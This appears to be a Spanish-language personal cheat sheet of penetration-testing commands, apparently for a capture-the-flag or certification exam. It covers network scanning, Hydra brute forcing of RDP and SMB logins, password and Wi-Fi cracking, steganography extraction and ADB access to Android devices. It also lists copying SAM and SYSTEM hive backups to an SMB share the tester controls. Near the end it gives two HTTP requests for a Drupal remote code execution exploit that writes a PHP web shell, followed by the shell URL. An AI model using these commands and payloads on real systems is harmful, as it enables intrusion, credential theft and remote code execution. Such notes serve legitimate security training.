NOTES V12

 

NOTAS....

COMANDOS.

Para enumerar la red

sudo arp-scan -local 
netdiscover -i 192.168.10.1 
nmap -sn ip/24

Este comando sirve para identificar el DC, tambien es posible con el 389

nmap --script smb-os-discovery -p 445 192.168.10.1<DC>

Comando para buscar el DC, con protocolos comunes.

nmap -p 53,88,389,636 --open -sV 192.168.10.1/24

Comando para buscar productos basado en WEB.

nmap -p 80,443,8080,8443 --open -sV -A 192.168.10.1/24

Para buscar temas relacionados a SMB

sudo nmap -T4 -sS -p 139,445 --script vuln 192.168.0.0/24

Tambien es posible usar, pero es mejor comprobar en el equipo para sacar el FQDN

nslookup 192.168.10.1

EJEMPLOS DE SERVICIOS, no olvidarse de escanear todas las redes.

nmap -sV -p 25,80,110,143 192.168.10.1/24

PROTOCOLO RDP

nmap -p 3389 --open -sV 192.168.10.1/24

CRACKING PASSWORD HYDRA

hydra -t 1 -V -f -l Test -P /home/thedaniux/Dic.txt rdp://192.168.10.1

CRACKING CON OPENSSL

openssl enc -aes-256-cbc -d -in file.cfe -out decrypted_image.jpg -k Contrasena123

Decifrar o sacar sum.

cksum decrypted_image.jpg

Online Servicio

https://emn178.github.io/online-tools/crc/

Extrae informacion de una imagen Linux Tool.

steghide extract -sf Wallpaper.jpg

Windows Tool.

snow.exe -C -p "test" confidential.txt
- C compressing / uncompressing
-p password

Open Stego
GUI tool

Como conectarse conectarse mediante Android


nmap -p 80,443,8080,8443,5228 --open 192.168.10.0/24

Conectarse via ADB

adb connect 192.168.10.1:5555

adb shell

find /sdcard/ -name "*.jpg" -o -name "*.png"

Descarga una imagen a una ruta especifica. 
adb pull /sdcard/test/imagen.jpg ./download.jpg

Encontrar archivos

find / -type f -name ArchivBuscar.txt 2> /dev/null

34

Me Permite sacar informarmacion oculta.

stegsnow -p ContrasenaFile -C OcultoArchivo.txt salida.txt

SMB

nmap -p 139,445 --open -sV 192.168.10.0/24

CRACKED SMB

hydra -L users.txt -P password.txt 192.168.10.1 smb

Interactuar con smb.

smbclient \\\\\\\\192.168.10.1\\\\Recurso -U usuario%password

Identificar puertos usados por el RAT.

nmap -p 445,8080,3389 --open 192.168.10.0/24

65

NA

66

PAra filtrar trafico a una ip destino

ip.dst==172.22.10.10

Revisar drupal

/core/CHANGELOG.txt

Crackear archivos o hashs

john --format=Raw-MD5 --wordlist=Wordlist.txt PasswordEncriptada.txt

WIFI HACKING

Permite identificar el SSID BSSID y canal del WIFI

airodump-ng Thedaniux.cap

Usa airodump-ng para capturar más paquetes relacionados con el AP:

Esto generará un archivo llamado Hackerman-01.cap

airodump-ng --bssid 00:00:00:00:00:00 --channel 10 -w outputfile Hackerman.cap

Crackear password

aircrack-ng -w /home/thedaniux/wordlist.txt CapturadorWIFI.cap

Este comando sirve para filtrar el protocolo MQTT

mqtt.msgtype == 3


Se puede calcualr la entropia de un archivo mediante ent,

ent Archivito.elf

Luego se puede incluso sacar el HASH.

Escane vulnerabilidades.

nmap -Pn - -script vuln 172.20.0.16

Escaner Protocolos que se pueda iniciar sesion

nmap -p 22,23,80,3389 192.168.0.0/24

ddos2

  1. ¿Por Qué Usar el Filtro
tcp.flags.syn == 1 and tcp.flags.ack == 0

• Un ataque DDoS a menudo se basa en el envío masivo de solicitudes de inicio de conexión (SYN flood) para saturar los recursos del servidor.

  1. ¿Qué Representa Statistics > Conversations**?**

• Este panel muestra todas las conversaciones IPv4 (IP origen a IP destino) con información como:

• Número de paquetes enviados (Packets A→B).

• Bytes transmitidos (Bytes A→B).


Puertos comunes usados por RATS


nmap -p 9871,6703 192.168.0.0/24



Crear server SMB

impacket-smbserver smbFolder $(pwd) -smb2support -username admin -password admin

Conectarse al server.

net use x: \\\\192.168.10.1\\smbFolder /user:admin admin

COPIARSE EL NTDS DE LA MAQUINA LOCAL

Paso los archivos

copy sam.backup x:\\sam
copy system.backup x:\\system


------------------------

POST /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=echo+'<%3fphp+system($_GET["cmd"])%3b+%3f>'+>+shell.php;ls HTTP/1.1

Host: 10.203.23.131:8080

Content-Length: 98

Cache-Control: max-age=0

Accept-Language: es-419,es;q=0.9

Origin: http://10.203.23.131:8080

Content-Type: application/x-www-form-urlencoded

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7

Referer: http://10.203.23.131:8080/user/password

Accept-Encoding: gzip, deflate, br

Connection: keep-alive

form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password



Segunda PETICION


POST /?q=file%2Fajax%2Fname%2F%23value%2Fform-eGM2LCnwCRK0HyXkZRIYOQWvuwh36DFdBPjME0_7KCU HTTP/1.1

Host: 10.203.23.131:8080

Content-Length: 62

Cache-Control: max-age=0

Accept-Language: es-419,es;q=0.9

Origin: http://10.203.23.131:8080

Content-Type: application/x-www-form-urlencoded

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7

Referer: http://10.203.23.131:8080/user/password

Accept-Encoding: gzip, deflate, br

Connection: keep-alive


form_build_id=form-eGM2LCnwCRK0HyXkZRIYOQWvuwh36DFdBPjME0_7KCU

buscar form_build_id

http://172.20.10.3:8080/shell.php?cmd=ls


Comentarios